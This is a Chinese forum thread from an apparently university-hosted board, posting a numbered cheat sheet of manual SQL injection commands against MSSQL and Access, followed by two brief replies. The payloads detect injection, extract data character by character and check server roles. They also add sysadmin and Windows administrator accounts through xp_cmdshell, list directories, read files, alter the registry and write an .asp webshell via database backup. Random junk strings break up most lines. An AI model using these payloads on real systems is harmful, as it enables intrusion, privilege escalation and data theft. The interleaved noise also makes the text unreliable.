社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4111阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 /bg8oB4  
  2.初步判断是否是mssql ;and user>0 3fpX  
9;.dNdg>  
  3.注入参数是字符'and [查询条件] and ''=' x< imMJ  
 d+=;sJ  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' y![h  
NmK%k jCx  
  5.判断数据库系统 x'}{^'}/  
m`n51i{U  
  ;and (select count(*) from sysobjects)>0 mssql 0\u_ \%[  
WpRi+NC}ln  
  ;and (select count(*) from msysobjects)>0 access CKj3-rcF(  
A*W QdY  
IhUuL0  
UGl}=hwKkG  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 E|#'u^`yv  
'tF<7\!  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 !! #\P7P  
8iq~ha$]|  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 jt?R a1Z  
nLYyS#  
  9.(1)猜字段的ascii值(access) =n%?oLg^  
^fH]Rlx  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]kc]YO7i%R  
{d=y9Jb^  
  (2)猜字段的ascii值(mssql) V5R``T p  
_M{m6k(h  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 R(ay&f%E  
obUh+9K  
  10.测试权限结构(mssql) ?zxKk(J  
k5W5 9tz  
uPb9j;Q?  
N/]TZu~k z  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--  RtK/bUa  
VM|8HR7U  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >[ywrB ?T  
PL wa!j  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?DM-C5$  
fFMG9]*  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <[b\V+M  
350y6pVh  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0s= GM|y  
wMei`svY  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .3oFSc`q  
LTG/gif[u  
  ;and 1=(select IS_MEMBER('db_owner'));-- H~&9xtuHN  
BYP,}yzA  
tlG&PVvr  
;v#~ o*  
  11.添加mssql和系统的帐户 RQv`D&u_  
Onby=Y o6  
  ;exec master.dbo.sp_addlogin username;-- P6;L\9=H<  
  ;exec master.dbo.sp_password null,username,password;-- luAhyEp  
{P(IA2J'S  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- zaR~fO  
BwrMRMq"  
  ;exec master.dbo.xp_cmdshell 'net user username password [K%J t  
[JsQ/|=z  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kVZ>Dc2M  
uflp4_D   
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2= u5N[*  
v-4eN1OS  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t~gnai  
ZJ  u\  
O3B\K <l  
'^}l|(  
  12.(1)遍历目录 $:F]O$A  
*m2J$9q  
  ;create table dirs(paths varchar(100), id int) F71.%p7C8"  
Bglh}_X  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' ytr~} M%  
<dh7*M  
  ;and (select top 1 paths from dirs)>0 !)KX?i[Q  
2A {k>TjQ  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z6 (;~"Em  
cD]{ Nn  
L@9"6&  
"?n~ /9`  
  (2)遍历目录 hZ5h(CQ?"#  
o=4d2V%m  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +*~?JT  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 i$"B  
3x.|g   
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 V1;n5YL  
a{,EX[~b  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 EivZI<<a  
jja9:$#  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =)(sN"%  
L0_R2E A  
4:5CnK  
315Rk!{AJ  
  13.mssql中的存储过程 !2$O^ }6"  
\} P}H  
  xp_regenumvalues 注册表根键, 子键 OT\[qaK  
r4D6g>)h1q  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 l^WFMeMD3a  
&-s!ko4z  
  xp_regread 根键,子键,键值名 [uW{Ap~2  
qP*$wKY,  
  ;exec xp_regread :1s6h%evrT  
'72ZLdi}-  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 i{ eDV  
dGTAZ(1W  
  xp_regwrite 根键,子键, 值名, 值类型, 值 KKl8tI\u~  
0:Ak 4L6k  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 f LxFF  
aZ@Ke$jD  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Z,_yE*q  
I( G8cK  
  xp_regdeletevalue 根键,子键,值名 \{P(s:  
X#Ajt/XQ  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V<?t( _Y  
SP 97Q-  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;HgV(d#X  
/@Y/(+DE  
O.  V!L  
wYOSaGyZ0I  
  14.mssql的backup创建webshell v.c2(w/P  
} |(KI  
  use model 0r.*7aXu  
DU|0#z=*t5  
  create table cmd(str image); ` ` 6?;Y  
C$b$)uI;  
  insert into cmd(str) values (''); B}C"Xc  
VD<W  
  backup database model to disk='c:\l.asp'; 0".pw; .}  
-_4U+Cfmtl  
MX xRM~  
RiIJ#:6+^I  
  15.mssql内置函数 Ck/4h Z  
k#w[G L|T  
  ;and (select @@version)>0 获得Windows的版本号 3;>|*(cO  
Kisd.~u8j  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa I.euuzBgA  
Wu,'S;>C  
  ;and (select user_name())>0 爆当前系统的连接用户 d/j$_NQ&!  
qR--lvO  
  ;and (select db_name())>0 得到当前连接的数据库 K #}DXq  
BOoLs(p  
&w- QMj M>  
]o6Or,ml  
  16.简洁的webshell !dv  
H"N o{|^<  
  use model 9axJ2J'g  
4Sfv  
  create table cmd(str image); +3(1QgYM%  
[kDjht|$>  
  insert into cmd(str) values (''); Wt"fn&R}  
2a3h m8%U  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八